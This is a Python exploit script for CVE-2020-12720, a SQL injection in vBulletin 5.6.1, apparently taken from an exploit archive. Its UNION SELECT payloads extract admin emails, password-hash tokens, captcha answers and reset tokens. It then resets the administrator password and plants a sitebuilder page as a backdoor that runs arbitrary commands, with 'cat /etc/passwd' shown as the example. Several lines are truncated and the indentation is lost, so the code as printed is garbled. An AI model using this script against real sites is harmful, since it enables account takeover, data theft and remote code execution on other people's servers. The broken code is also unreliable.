# Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection  
# Date: 2020-05-15  
# Exploit Author: Photubias  
# Vendor Advisory: [1]  
# Version: vBulletin v5.6.x (prior to Patch Level 1)  
# Tested on: vBulletin v5.6.1 on Debian 10 x64  
# CVE: CVE-2020-12720 vBulletin v5.6.1 (SQLi) with path to RCE  
#!/usr/bin/env python3  
Copyright 2020 Photubias(c)  
This program is free software: you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation, either version 3 of the License, or  
(at your option) any later version.  
This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
GNU General Public License for more details.  
You should have received a copy of the GNU General Public License  
along with this program. If not, see <>.  
File name  
written by tijl[dot]deneut[at]howest[dot]be for  
This is a native implementation without requirements, written in Python 3.  
Works equally well on Windows as Linux (as MacOS, probably ;-)  
##-->> Full creds to @zenofex and @rekter0 <<--##  
import urllib.request, urllib.parse, sys, http.cookiejar, ssl, random, string  
## Static vars; change at will, but recommend leaving as is  
sADMINPASS = '12345678'  
sCMD = 'id'  
sURL = ''  
sUSERID = '1'  
sNEWPASS = '87654321'  
iTimeout = 5  
## Ignore unsigned certs  
ssl._create_default_https_context = ssl._create_unverified_context  
## Keep track of cookies between requests  
cj = http.cookiejar.CookieJar()  
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))  
def randomString(stringLength=8):  
letters = string.ascii_lowercase  
return ''.join(random.choice(letters) for i in range(stringLength))  
def getData(sUrl, lData):  
oData = urllib.parse.urlencode(lData).encode()  
oRequest = urllib.request.Request(url = sUrl, data = oData)  
return, timeout = iTimeout)  
print('----- ERROR, site down?')  
def verifyBug(sURL,sUserid='1'):  
sPath = 'ajax/api/content_infraction/getIndexableContent'  
lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
if not 'cve-2020-12720' in sResponse:  
print('[!] Warning: not vulnerable to CVE-2020-12720, credentials are needed!')  
return False  
print('[+] SQLi Success!')  
return True  
def takeoverAccount(sURL, sNEWPASS):  
sPath = 'ajax/api/content_infraction/getIndexableContent'  
### Source:  
## Get Table Prefixes  
lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
if 'rawtext' in sResponse: sPrefix = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').replace('language','')  
else: sPrefix = ''  
#print('[+] Got table prefix "'+sPrefix+'"')  
## Get usergroup ID for "Administrators"  
lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'usergroup WHERE title=\'Administrators\';--'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
sGroupID = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')  
#print('[+] Administrators Group ID: '+sGroupID)  
## Get admin data, including original token (password hash), TODO: an advanced exploit could restore the original hash in post exploitation  
lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from ' + sPrefix + 'user where usergroupid=' + sGroupID + ';--'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
sUsername,sUserid,sUsermail,sUserTokenOrg = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').split('|')  
#print('[+] Got original token (' + sUsername + ', ' + sUsermail + '): ' + sUserTokenOrg)  
## Let's create a Human Verify Captcha  
sPath = 'ajax/api/hv/generateToken?'  
lData = {'securitytoken':'guest'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
if 'hash' in sResponse: sHash = sResponse.split('hash')[1].split(':')[1].replace('}','').replace('"','')  
else: sHash = ''  
## Get the captcha answer from DB  
sPath = 'ajax/api/content_infraction/getIndexableContent'  
lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit 0,1--'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
if 'rawtext' in sResponse: iAnswers = int(sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"',''))  
else: iAnswers = 1  
lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit ' + str(iAnswers-1) + ',1--'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
if 'rawtext' in sResponse: sAnswer = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')  
else: sAnswer = ''  
## Now request PW reset and retrieve the token  
sPath = 'auth/lostpw'  
lData = {'email':sUsermail,'humanverify[input]':sAnswer,'humanverify[hash]':sHash,'securitytoken':'guest'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
sPath = 'ajax/api/content_infraction/getIndexableContent'  
lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'useractivation WHERE userid=' + sUserid + ' limit 0,1--'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
if 'rawtext' in sResponse: sToken = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')  
else: sToken = ''  
## Finally the password reset itself  
sPath = 'auth/reset-password'  
lData = {'userid':sUserid,'activationid':sToken,'new-password':sNEWPASS,'new-password-confirm':sNEWPASS,'securitytoken':'guest'}  
sResponse = getData(sURL + sPath, lData).read().decode()  
if not 'Logging in' in sResponse:  
print('[-] Failed to reset the password')  
return ''  
print('[+] Success! User ' + sUsername + ' now has password ' + sNEWPASS)  
return sUserid  
def createBackdoor(sURL, sADMINPASS, sUserid='1'):  
## Activating Sitebuilder  
sPath = 'ajax/activate-sitebuilder'  
lData = {'pageid':'1', 'nodeid':'0','userid':'1','loadMenu':'false', 'isAjaxTemplateRender':'true', 'isAjaxTemplateRenderWithData':'true','securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}  
oResponse = getData(sURL + sPath, lData)  
if not oResponse.code == 200:  
print('[-] Error activating sitebuilder')  
## Confirming the password, getting new securitytoken  
sPath = 'auth/ajax-login'  
lData = {'logintype':'cplogin','userid':sUserid,'password':sADMINPASS,'securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}  
oResponse = getData(sURL + sPath, lData)  
sResponse =  
if 'lostpw' in sResponse:  
print('[-] Error: authentication for userid ' + sUserid + ' failed')  
sToken = sResponse.split(',')[1].split(':')[1].replace('"','').replace('}','')  
print('[+] Got token: '+sToken)  
## cpsession is needed, use this for extra verification  
#for cookie in cj: print(, cookie.value, cookie.domain) #etc etc  
## First see if our backdoor does not already exists  
sPath = 'ajax/render/admin_sbpanel_pagelist_content_wrapper'  
lData = {'isAjaxTemplateRenderWithData':'true','securitytoken':sToken}  
oResponse = getData(sURL + sPath, lData)  
sResponse =  
if 'cve-2020-12720' in sResponse:  
sPageName = 'cve-2020-12720-' + sResponse.split('/cve-2020-12720-')[1].split(')')[0]  
print('[+] This machine was already pwned, using "' + sPageName + '" for your command')  
return sPageName  
## Create a new empty page  
sPath = 'ajax/api/widget/saveNewWidgetInstance'  
lData = {'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':sToken}  
oResponse = getData(sURL + sPath, lData)  
sResponse =  
sWidgetInstanceID = sResponse.split(',')[0].split(':')[1].replace('}','')  
sPageTemplateID = sResponse.split(',')[1].split(':')[1].replace('}','')  
print('[+] Got WidgetInstanceID: '+sWidgetInstanceID+' and PageTemplateID: '+sPageTemplateID)  
## Now submitting the page content  
sPageName = 'cve-2020-12720-'+randomString()  
sPath = 'ajax/api/widget/saveAdminConfig'  
lData = {'widgetid':'23',  
oResponse = getData(sURL + sPath, lData)  
if not oResponse.code == 200: print('[!] Error submitting page content for ' + sPageName)  
## Finally saving the new page  
sPath = 'admin/savepage'  
lData = {'input[ishomeroute]':'0',  
'input[displaysections[0]]':'[{"widgetId":"23","widgetInstanceId":"' + sWidgetInstanceID + '"}]',  
oResponse = getData(sURL + sPath, lData)  
if not oResponse.code == 200: print('[!] Error saving page content for ' + sPageName)  
return sPageName  
def main():  
if len(sys.argv) == 1:  
print('[!] No arguments found: python3 <URL> <CMD>')  
print(' Example: ./ "cat /etc/passwd"')  
print(' But for now, ask questions then')  
sURL = input('[?] Please enter the address and path to vBulletin ([ ')  
if sURL == '': sURL = ''  
sURL = sys.argv[1]  
sCMD = sys.argv[2]  
if not sURL[:-1] == '/': sURL += '/'  
if not sURL[:4].lower() == 'http': sURL = 'http://' + sURL  
print('[+] Welcome, first verifying the SQLi vulnerability')  
if verifyBug(sURL):  
print("----\n" + '[+] Attempting automatic admin account takeover')  
sUSERID = takeoverAccount(sURL, sNEWPASS)  
if sUSERID == '':  
sUSERID = '1'  
sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')  
sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')  
print("----\n"+'[+] So far so good, attempting the creation of the backdoor')  
sPageName = createBackdoor(sURL, sADMINPASS, sUSERID)  
if len(sys.argv) == 1: sCMD = input('[?] Please enter the command to run [id]: ')  
if sCMD == '': sCMD = 'id'  
sCmd = urllib.parse.quote(sCMD)  
sPath = sPageName + "?cmd=" + sCmd  
print('[+] Opening '+sURL + sPath)  
oRequest = urllib.request.Request(url = sURL + sPath)  
oResponse =, timeout = iTimeout)  
sResponse =  
print('[+] Command result:')  
print('[-] Something went wrong, bad command?')  
if __name__ == "__main__":  